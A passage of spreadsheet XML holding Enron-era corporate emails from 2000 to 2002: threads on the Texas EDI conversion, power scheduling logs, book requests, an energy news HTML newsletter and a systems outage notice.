    <t>Mon, 29 Oct 2001 09:16:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jean.ryall@enron.com', 'patrick.keene@enron.com', 'thane.twiggs@enron.com', 'gloria.ogenyi@enron.com'})</t>
  </si>
  <si>
    <t>FW: Texas Conversion to EDI Version 1.4</t>
  </si>
  <si>
    <t>This is critical that we are all pushing this...  Please let me know if any obstacles develop._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hetrick, Nancy  _x000D_
Sent:	Monday, October 29, 2001 11:08 AM_x000D_
To:	Steffes, James D._x000D_
Subject:	FW: Texas Conversion to EDI Version 1.4_x000D_
_x000D_
Just an FYI.  Input from EES desk._x000D_
_x000D_
Nancy A. Hetrick_x000D_
Enron Corp._x000D_
Director, Government Affairs_x000D_
Phone:  712-366-3399_x000D_
Pager:   888-912-1426_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ochsner, Preston  _x000D_
Sent:	Monday, October 29, 2001 11:00 AM_x000D_
To:	Hetrick, Nancy_x000D_
Cc:	Wagner, Joseph; Misra, Narsimha_x000D_
Subject:	RE: Texas Conversion to EDI Version 1.4_x000D_
_x000D_
Nancy,_x000D_
_x000D_
Thanks. That does help. _x000D_
_x000D_
We want Option C. Let us know if there is anything we can do to ensure that option is selected._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hetrick, Nancy  _x000D_
Sent:	Monday, October 29, 2001 10:56 AM_x000D_
To:	Ochsner, Preston_x000D_
Subject:	RE: Texas Conversion to EDI Version 1.4_x000D_
_x000D_
That is true in Option A and Option B.  The key to Option C is that we would have January and February meter read cycle to switch our customer before they would be switched to the affilliate as a customer who did not switch.  Option A and B, EES would not possibly get customers in TNMP and AEP if their meters are read during the first two weeks of the month.  We could send switches for Reliant and TXU for the first two weeks of the month, before the December moratorium.  Does this help?_x000D_
_x000D_
Nancy A. Hetrick_x000D_
Enron Corp._x000D_
Director, Government Affairs_x000D_
Phone:  712-366-3399_x000D_
Pager:   888-912-1426_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ochsner, Preston  _x000D_
Sent:	Monday, October 29, 2001 10:54 AM_x000D_
To:	Hetrick, Nancy_x000D_
Subject:	RE: Texas Conversion to EDI Version 1.4_x000D_
_x000D_
So._x000D_
_x000D_
Best case - We submit on January 2 and the customers get switched on their January meter read date. _x000D_
_x000D_
Worst case - We submit on January 2 and the customers get switched on their February meter read date._x000D_
_x000D_
Is this correct?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hetrick, Nancy  _x000D_
Sent:	Monday, October 29, 2001 10:48 AM_x000D_
To:	Ochsner, Preston_x000D_
Subject:	RE: Texas Conversion to EDI Version 1.4_x000D_
_x000D_
Yes, it is.  Do we have a lot of customers lined up in those two service areas?_x000D_
_x000D_
Nancy A. Hetrick_x000D_
Enron Corp._x000D_
Director, Government Affairs_x000D_
Phone:  712-366-3399_x000D_
Pager:   888-912-1426_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ochsner, Preston  _x000D_
Sent:	Monday, October 29, 2001 10:47 AM_x000D_
To:	Hetrick, Nancy; Fite, Rebecca; 'ahafner2@csc.com'; 'sharms@csc.com'_x000D_
Subject:	RE: Texas Conversion to EDI Version 1.4_x000D_
_x000D_
Nancy,_x000D_
_x000D_
Is it a given that we will not be able to submit any switches in TNMP or AEP until January 2? _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hetrick, Nancy  _x000D_
Sent:	Monday, October 29, 2001 10:10 AM_x000D_
To:	Fite, Rebecca; Ochsner, Preston; 'ahafner2@csc.com'; 'sharms@csc.com'_x000D_
Subject:	Texas Conversion to EDI Version 1.4_x000D_
Importance:	High_x000D_
_x000D_
Please review the attached documents and provide input to me no later than noon, Tuesday, October 30th.  I have made notes in red on items of interest, etc.  I have also attached a document of questions and concerns from the PUCT staff.  RMS is holding a workshop on Wednesday and Thursday of this week to finalize our recommendation and plan for the conversion.  Please let me know if you have any questions.  _x000D_
 &lt;&lt; File: Enron - Version 1.4 Conversion Options.doc &gt;&gt;  &lt;&lt; File: FW PUC Concerns with V. 1.4 Cutover.rtf &gt;&gt; _x000D_
_x000D_
Nancy A. Hetrick_x000D_
Enron Corp._x000D_
Director, Government Affairs_x000D_
Phone:  712-366-3399_x000D_
Pager:   888-912-1426</t>
  </si>
  <si>
    <t>Sat, 13 Oct 2001 19:39:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 10/13/01; HourAhead hour: 22;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 10/13/01; HourAhead hour: 22;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001101322.txt_x000D_
_x000D_
Error retrieving HourAhead price data - process continuing..._x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 10/13/01_x000D_
  TIE_POINT: MALIN_5_RNDMTN_x000D_
  INTERCHG_ID: EPMI_CISO_YELLOW_x000D_
  ENGY_TYPE: WHEEL_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 10/13/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_YELLOW_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 04:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Weekly GE Conference Call</t>
  </si>
  <si>
    <t>Here's what I have for an electronic file of the exhibits._x000D_
_x000D_
_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 06:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.novak@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'brett.wiggs@enron.com'})</t>
  </si>
  <si>
    <t>Re: Eletrobolt Turbine Shipment</t>
  </si>
  <si>
    <t xml:space="preserve">John -- Just to confirm my conversation with Mark, Tozzini reviewed the _x000D_
conditions of our environmental permits and confirmed that we are in _x000D_
compliance._x000D_
_x000D_
Rgds,_x000D_
 John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brett R Wiggs_x000D_
05/16/2001 12:16 PM_x000D_
To: John J Lavorato/Corp/Enron@Enron_x000D_
cc: Mark E Haedicke@ECT, John Novak/SA/Enron@Enron, Joe _x000D_
Kishkill/SA/Enron@Enron, Orlando Gonzalez/SA/Enron@Enron _x000D_
_x000D_
Subject: Eletrobolt Turbine Shipment_x000D_
_x000D_
John:_x000D_
_x000D_
We executed the transmission connection contract with Light (local _x000D_
distribution company) yesterday for the project.  Based on completing this _x000D_
agreement and our conversation, we are moving forward with the shipment of _x000D_
the turbines.  Initial loading of loose items will start this afternoon and _x000D_
turbines tomorrow with a planned departure of the ship on Sunday.  Let me _x000D_
know if you have any questions or comments?_x000D_
_x000D_
Thanks,_x000D_
Brett_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 03:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>You can take the FREE Spiritual Gifts Analysis test!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Dana Davis/HOU/ECT on 02/20/2001 11:17 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
larrygilbert@dpnet.net (Church Growth Institute) on 02/20/2001 11:34:08 AM_x000D_
To: Dana.Davis@enron.com_x000D_
cc:  _x000D_
Subject: You can take the FREE Spiritual Gifts Analysis test!_x000D_
_x000D_
_x000D_
---------------------------------------------------------------------------_x000D_
_x000D_
Dear Friend,_x000D_
_x000D_
A friend of yours, Bonnie Abraham, just took the Spiritual Gifts Analysis_x000D_
Test at the Church Growth Institute web site. Your friend thought it was_x000D_
very valuable and wanted to tell you about this unique FREE service!_x000D_
_x000D_
Point your browser to the following web address, take the Spiritual Gifts_x000D_
Analysis Test, and within minutes you'll know your dominant spiritual_x000D_
gift and what you can do with it to minister to others. Here's the address:_x000D_
_x000D_
http://www.teamministry.com/_x000D_
_x000D_
I do hope you'll take advantage of this unique opportunity to learn about_x000D_
yourself and how the Lord has gifted you!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Larry Gilbert_x000D_
_x000D_
President, Church Growth Institute_x000D_
_x000D_
PS: Here's what your friend wanted to say to you:_x000D_
_x000D_
Dana, Here is another inventory that I have taken in the past._x000D_
It's a very good one. Let me know what you think. BA _x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 15:07:53 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Important! DART product</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Semperger, Cara  _x000D_
Sent:	Thursday, November 08, 2001 12:19 PM_x000D_
To:	Crandall, Sean_x000D_
Subject:	RE: Important! DART product_x000D_
_x000D_
I think that if the Enpower guys can modify the Build Route Reports to have a check box that says Exclude DART deals, and have it default to the checked position._x000D_
_x000D_
That should take care of it._x000D_
_x000D_
 (Both versions of build route, Will Smith will know what I am talking about). _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Crandall, Sean  _x000D_
Sent:	Thursday, November 08, 2001 12:07 PM_x000D_
To:	Semperger, Cara_x000D_
Subject:	FW: Important! DART product_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chang, Fran  _x000D_
Sent:	Thursday, November 08, 2001 10:53 AM_x000D_
To:	Crandall, Sean_x000D_
Subject:	Important! DART product_x000D_
Importance:	High_x000D_
_x000D_
Sean:_x000D_
_x000D_
Torrey Moorer in EOL IT group has created the Mid-C DART product on EOL.  In the future when a trade is done on EOL, it will be bridged into Enpower Deal Entry. However, although the "DART flag" will be on in deal entry, I believe for now it's informational only, and it's not doing anything to alert the schedulers.  I would like to know the rationale for creating this DART product and how you would like the schedulers in Day Ahead group (Cara's group) and Real Time (Bill's group) to see in their applications.  If I can get this info from you, I'll work with Enpower IT to put all necessary DART processes in place.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fran Chang_x000D_
West Power Risk Management_x000D_
503.464.7973 (phone)_x000D_
503.464.3740 (fax)_x000D_
            </t>
  </si>
  <si>
    <t>Mon, 7 Jan 2002 05:56:54 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: new book req</t>
  </si>
  <si>
    <t xml:space="preserve">susan is the correct person, she should be in later this am._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Keiser, Kam  _x000D_
Sent:	Monday, January 07, 2002 7:27 AM_x000D_
To:	Wilson, Shona_x000D_
Subject:	RE: new book req_x000D_
_x000D_
Shona,_x000D_
_x000D_
I understand we will now the group to set up new books.  Can we get some instructions from someone in your group, Susan I assume.  John Valdes and myself will be the ones to take this over.  Please let me know if Susan is this person and we'll get with her today._x000D_
_x000D_
Thanks_x000D_
_x000D_
Kam_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Wilson, Shona  _x000D_
Sent:	Friday, January 04, 2002 4:59 PM_x000D_
To:	Love, Phillip M.; Keiser, Kam; Winfree, O'Neal D.; Giron, Darron C.; McLaughlin Jr., Errol; Palmer, B. Scott; Gossett, Jeffrey C._x000D_
Cc:	Trevino, Susan_x000D_
Subject:	RE: new book req_x000D_
_x000D_
Are any of you still around?  I need to talk to one of you about this request.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Trevino, Susan  _x000D_
Sent:	Friday, January 04, 2002 3:58 PM_x000D_
To:	Wilson, Shona; Abel, Chris; Ayala, Susie_x000D_
Subject:	FW: new book req_x000D_
_x000D_
FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Friday, January 04, 2002 1:24 PM_x000D_
To:	Keiser, Kam; Trevino, Susan_x000D_
Cc:	Winfree, O'Neal D.; Giron, Darron C.; McLaughlin Jr., Errol; Palmer, B. Scott_x000D_
Subject:	RE: new book req_x000D_
_x000D_
Susan,_x000D_
attached is a new matrix for each desk.  This should replace the previous matrix you are using.  We are just putting our groups down in the access request list and this should be used to cross reference.  Please let me know if you have any questions.  Thanks._x000D_
PL_x000D_
 &lt;&lt; File: desk matrix.xls &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Keiser, Kam  _x000D_
Sent:	Friday, January 04, 2002 1:01 PM_x000D_
To:	Trevino, Susan_x000D_
Cc:	Love, Phillip M.; Winfree, O'Neal D.; Giron, Darron C.; McLaughlin Jr., Errol; Palmer, B. Scott_x000D_
Subject:	new book req_x000D_
_x000D_
Susan,_x000D_
_x000D_
These are book requests for the Netco books for all regions._x000D_
_x000D_
Please let me know if you have any questions.  We put in some book and portfolio codes we would like if they are available.  If not, please call me.  We need all price, basis, index, and gas daily US books to be the same, all Canadian books to be the same and all physical books to have the same codes please._x000D_
_x000D_
Thanks_x000D_
_x000D_
Kam_x000D_
_x000D_
_x000D_
 &lt;&lt; File: Book Request Form  Financial.xls &gt;&gt;  &lt;&lt; File: Book Request Form Central.xls &gt;&gt;  &lt;&lt; File: Book Request Form East.xls &gt;&gt;  &lt;&lt; File: Book Request Form Texas.xls &gt;&gt;  &lt;&lt; File: Book Request Form West.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 03:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Oil Week Ahead - Dec 4-00</t>
  </si>
  <si>
    <t xml:space="preserve">print_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 12/01/2000 _x000D_
11:22 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Fraser                           12/01/2000 11:11 AM_x000D_
	_x000D_
_x000D_
To: Alex Mcleish/EU/Enron@Enron, Jeffrey A Shankman/HOU/ECT@ECT, Chris _x000D_
Gaskill/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Oil Week Ahead - Dec 4-00_x000D_
_x000D_
Here is Alex's superb report._x000D_
_x000D_
Chris--- Do you want to put it on the gas site?_x000D_
_x000D_
JEn_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 16:06:41 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=iso-8859-1"&gt;_x000D_
&lt;html&gt;&lt;head&gt;_x000D_
&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;_x000D_
_x000D_
&lt;title&gt;Energy News Live Daily Wrap-Up&lt;/title&gt;_x000D_
_x000D_
&lt;/head&gt;_x000D_
_x000D_
&lt;body bgcolor="#FFFFFF" link="#0000ff" alink="#0000ff" vlink="#0000ff"_x000D_
topmargin=0 leftmargin=0 marginheight=0 marginwidth=0&gt;_x000D_
&lt;img_x000D_
src="http://www.energynewslive.com/ImageLogServlet/content/email/graphics/he_x000D_
ader.jpg?email=don.baughman@enron.com" width="600" height="95"&gt;_x000D_
&lt;br&gt;_x000D_
&lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
  &lt;tr&gt;_x000D_
    &lt;td width="45"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
    &lt;td width="5"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
    &lt;td width="500"&gt;_x000D_
        &lt;font face="verdana,arial,helvetica" size=-1&gt;_x000D_
      &lt;p&gt;Dear Don,&lt;/p&gt;_x000D_
&lt;!-- This mail was sent to "Don Baughman" &lt;don.baughman@enron.com&gt;, who belongs to list_x000D_
enl-members-html --&gt;_x000D_
&lt;!-- CONTENT START --&gt;_x000D_
_x000D_
&lt;p&gt;The &lt;b&gt;General Accounting Office&lt;/b&gt; made it official on Wednesday -_x000D_
the investigative arm of Congress will &lt;b&gt;sue Vice President Dick_x000D_
Cheney&lt;/b&gt; over his &lt;b&gt;refusal to turn over information&lt;/b&gt; related to_x000D_
the work of his &lt;b&gt;energy task force&lt;/b&gt;.  The GAO wants to know with_x000D_
whom the task force met, especially within the energy industry.  The_x000D_
&lt;b&gt;White House insists the request is inappropriate&lt;/b&gt; and promises to_x000D_
put up a fight.  On Thursday from the Washington bureau, we'll hear_x000D_
where this dispute is headed._x000D_
&lt;p&gt;The Washington bureau will also have the latest on the Congressional_x000D_
investigation into Enron.  Several new &lt;b&gt;Enron hearings&lt;/b&gt; have been_x000D_
added to next week's Congressional calendar.  &lt;b&gt;Two big hearings&lt;/b&gt;_x000D_
are scheduled for Monday and former &lt;b&gt;Enron CEO Kenneth Lay is expected_x000D_
to make an appearance at both&lt;/b&gt;.  This will be the &lt;b&gt;first time any_x000D_
Enron executive has testified before Congress&lt;/b&gt;._x000D_
&lt;p&gt;West Coast Bureau Correspondent Kym McNicholas will speak one-on-one_x000D_
with &lt;b&gt;Southern California Edison President Bob Foster&lt;/b&gt; Thursday._x000D_
He'll discuss &lt;b&gt;SoCal Edison's road to recovery&lt;/b&gt; during 1:00 p.m. ET_x000D_
newscast tomorrow._x000D_
&lt;p&gt;On Thursday from Houston, &lt;b&gt;Haynes and Boone LLP Attorney Lenny_x000D_
Parkins&lt;/b&gt; will join us to &lt;b&gt;provide legal analysis on the latest_x000D_
Enron developments&lt;/b&gt;.  Parkins is stopping by the bureau during the_x000D_
noon ET newscast tomorrow._x000D_
&lt;p&gt;&lt;b&gt;Energy Intelligence Group Bureau Chief Barbara Shook talks about_x000D_
LNG projects&lt;/b&gt;.  Some of the &lt;b&gt;projects that were scheduled to come_x000D_
online in the U.S.&lt;/b&gt; are now being &lt;b&gt;placed on the back burner due to_x000D_
low gas prices&lt;/b&gt;.  Catch Shook from the Houston bureau on Thursday._x000D_
&lt;p&gt;Finally from the NASDAQ in New York, &lt;b&gt;Tyumen Oil Company President_x000D_
and CEO Simon Kukes&lt;/b&gt; will join us.  He'll give us the &lt;b&gt;lowdown on_x000D_
Russian oil issues&lt;/b&gt; at 9:00 a.m. ET on Thursday._x000D_
&lt;p&gt;&lt;table cellpadding=1 cellspacing=0 border=1 bordercolor="#000000"_x000D_
width=350&gt;_x000D_
&lt;tr bgcolor="#cccccc"&gt;&lt;td align=center&gt;&lt;font color="#000000"_x000D_
face="verdana,arial,helvetica" size=-1&gt;&lt;b&gt;Closing_x000D_
Prices for Wednesday, Jan. 30, 2002&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
&lt;tr&gt;&lt;td align=left&gt;_x000D_
	&lt;table cellspacing=2 cellpadding=0 border=0&gt;_x000D_
		&lt;!--&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left width=100&gt;Commodity:&lt;/td&gt;_x000D_
			&lt;td align=right width=75&gt;Close Price&lt;/td&gt;_x000D_
			&lt;td align=right width=100&gt;Change_x000D_
Price&lt;/td&gt;&lt;/tr&gt;--&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left width=150&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Crude:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left width=125&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$19.08/bbl&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left width=75&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;-$0.50&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Unleaded:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$0.5531/gallon&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;-$0.0138&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Heating&amp;nbsp;Oil:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$0.5091/gallon&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;-$0.0114&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Gas:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$2.080/mmBtu&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;+$0.013&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Fwd&amp;nbsp;uE(Feb.):&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$3.37/mmBtu&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;+$0.01&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
	&lt;/table&gt;_x000D_
&lt;/td&gt;&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;p&gt;Keep in mind things are subject to change at a moment's notice._x000D_
Occasionally guests reschedule or change time slots.  We'll continue to_x000D_
do our best to keep you updated on future interviews and events._x000D_
_x000D_
&lt;p&gt;&lt;b&gt;Be sure to watch our newscasts every business day - 9 a.m. to 5_x000D_
p.m. ET, at the top of each hour.&lt;/b&gt;_x000D_
_x000D_
_x000D_
&lt;!-- CONTENT END   --&gt;_x000D_
_x000D_
    &lt;/font&gt;&lt;/p&gt;&lt;/td&gt;_x000D_
   &lt;td width="50"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
  &lt;/tr&gt;_x000D_
  &lt;tr&gt;_x000D_
    &lt;td&gt;&amp;nbsp;&lt;/td&gt;_x000D_
    &lt;td colspan="3"&gt;&lt;img_x000D_
src="http://www.energynewslive.com/content/email/graphics/signature.jpg"_x000D_
width="124" height="76" NOSEND="1"&gt;_x000D_
    &lt;td colspan="3"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
  &lt;/tr&gt;_x000D_
  &lt;tr&gt;_x000D_
    &lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
    &lt;td&gt;&lt;FONT face=verdana,arial,helvetica size=-1&gt;Jay Rickerts,_x000D_
EnergyNewsLive.com Anchor&lt;BR&gt;&lt;BR&gt;_x000D_
      &lt;b&gt;View today's Energy Wrap Video&lt;/b&gt;&lt;br&gt;_x000D_
      Windows Media Player: &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=d_x000D_
ailyWrap&amp;format=WMP&amp;speed=56&amp;email=don.baughman@enron.com"&gt; 56K&lt;/a&gt;  |_x000D_
&lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=d_x000D_
ailyWrap&amp;format=WMP&amp;speed=100&amp;email=don.baughman@enron.com"&gt; 100K&lt;/a&gt;  |_x000D_
&lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=d_x000D_
ailyWrap&amp;format=WMP&amp;speed=300&amp;email=don.baughman@enron.com"&gt; 300K&lt;/a&gt;_x000D_
      &lt;br&gt;_x000D_
      Real Player: &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=d_x000D_
ailyWrap&amp;format=REAL&amp;speed=56&amp;email=don.baughman@enron.com"&gt; 56K&lt;/a&gt;  |_x000D_
&lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=d_x000D_
ailyWrap&amp;format=REAL&amp;speed=100&amp;email=don.baughman@enron.com"&gt; 100K&lt;/a&gt;  |_x000D_
&lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=d_x000D_
ailyWrap&amp;format=REAL&amp;speed=300&amp;email=don.baughman@enron.com"&gt;_x000D_
300K&lt;/a&gt;&lt;br&gt;_x000D_
      &lt;br&gt;_x000D_
      (Requires &lt;a_x000D_
href="http://www.microsoft.com/windows/mediaplayer/en/download/Win32IE4x86.a_x000D_
sp"&gt;Windows Media Player&lt;/a&gt; or &lt;a href="http://www.real.com"&gt;Real_x000D_
Player&lt;/a&gt;)_x000D_
_x000D_
      &lt;br&gt;_x000D_
      &lt;br&gt;_x000D_
&lt;a href="http://www.energynewslive.com"&gt;Experience all that Williams Energy_x000D_
News Live has to offer!&lt;/a&gt;&lt;br&gt;&lt;br&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
If you are receiving this letter for the first time and wish to_x000D_
continue,&lt;br&gt;_x000D_
&lt;a href=mailto:join-enl-members-html@estutenws11.energy.williams.com&gt;_x000D_
subscribe now&lt;/a&gt;_x000D_
_x000D_
&lt;br&gt;&lt;br&gt;_x000D_
To stop receiving this letter, &lt;a_x000D_
href="http://www.energynewslive.com/NavController?referer=email.jsp&amp;action=u_x000D_
nsubscribeDailyWrap&amp;type=H&amp;email=don.baughman@enron.com"&gt; unsubscribe_x000D_
now&lt;/a&gt;_x000D_
_x000D_
&lt;br&gt;&lt;br&gt;_x000D_
If you are having trouble receiving this e-mail, please &lt;a_x000D_
href=mailto:ecenter@energynewslive.com&gt;let us know&lt;/a&gt; or_x000D_
call&lt;br&gt; (800) WILLIAMS (800-945-5426) weekdays, 7am-7pm CST._x000D_
&lt;br&gt;&lt;br&gt;_x000D_
Comments? Suggestions? &lt;a href=mailto:ecenter@energynewslive.com&gt;Let us_x000D_
know&lt;/a&gt; or_x000D_
call (800) WILLIAMS (800-945-5426) weekdays, 7am-7pm CST._x000D_
&lt;br&gt;&lt;br&gt;_x000D_
      &lt;font size=-3&gt;Copyright 2001 Williams Energy News Live, LLC. All_x000D_
Rights Reserved.&lt;/font&gt;&lt;/font&gt;_x000D_
    &lt;/td&gt;_x000D_
  &lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;/body&gt;_x000D_
&lt;/html&gt;_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 08:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Draft of Bush Transition Team Memo to Steve Kean</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,   As we just discussed, this is the transition memo suggesting that  _x000D_
you place a call to Clay Johnson.   As noted in the memo, we are still _x000D_
working through with the lawyers what leave status our employees would be _x000D_
required to take while serving on the private transition and the publicly _x000D_
funded transition.  The answer to this question may determine their _x000D_
willingness to serve, in some cases.  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 06:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bryan.kimzey@csfb.com'})</t>
  </si>
  <si>
    <t>Re: DLJ</t>
  </si>
  <si>
    <t>Rumors my ass.  AXA wants to sell to you guys and the street feels it _x000D_
favorable and a good fit for your business.  Overpay! Overpay! Overpay!</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 10:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 3-2-01 through 3-5-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
March 2, 2001 5:00pm through March 5, 2001 12:00am_x000D_
------------------------------------------------------------------------------_x000D_
------------------------_x000D_
  _x000D_
SCHEDULED SYSTEM OUTAGES:    ENA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ALSO SEE ORIGINAL REPORT_x000D_
Impact:  CORP_x000D_
Time:  Fri 3/2/2001 at  10:00:00 PM CT thru Fri 3/2/2001 at  10:15:00 PM CT_x000D_
 Fri 3/2/2001 at    8:00:00 PM PT thru Fri 3/2/2001 at     8:15:00 PM PT_x000D_
 Sat 3/3/2001 at  4:00:00 AM London thru Sat 3/3/2001 at  4:15:00 AM London_x000D_
Outage:  Reboot TRD-WAN-CR2_x000D_
Environments Impacted:  London, New York Metals, St. Louis Metals, Skilling _x000D_
Residence. The sites will lose connectivity for approx. three minutes._x000D_
Purpose: Tielines to the New York Metals office are down due to a bug in the _x000D_
Cisco code.  Reloading the router is supposed to fix the problem_x000D_
Backout: _x000D_
Contact(s):  Robert Humlicek   713-853-6366 _x000D_
     _x000D_
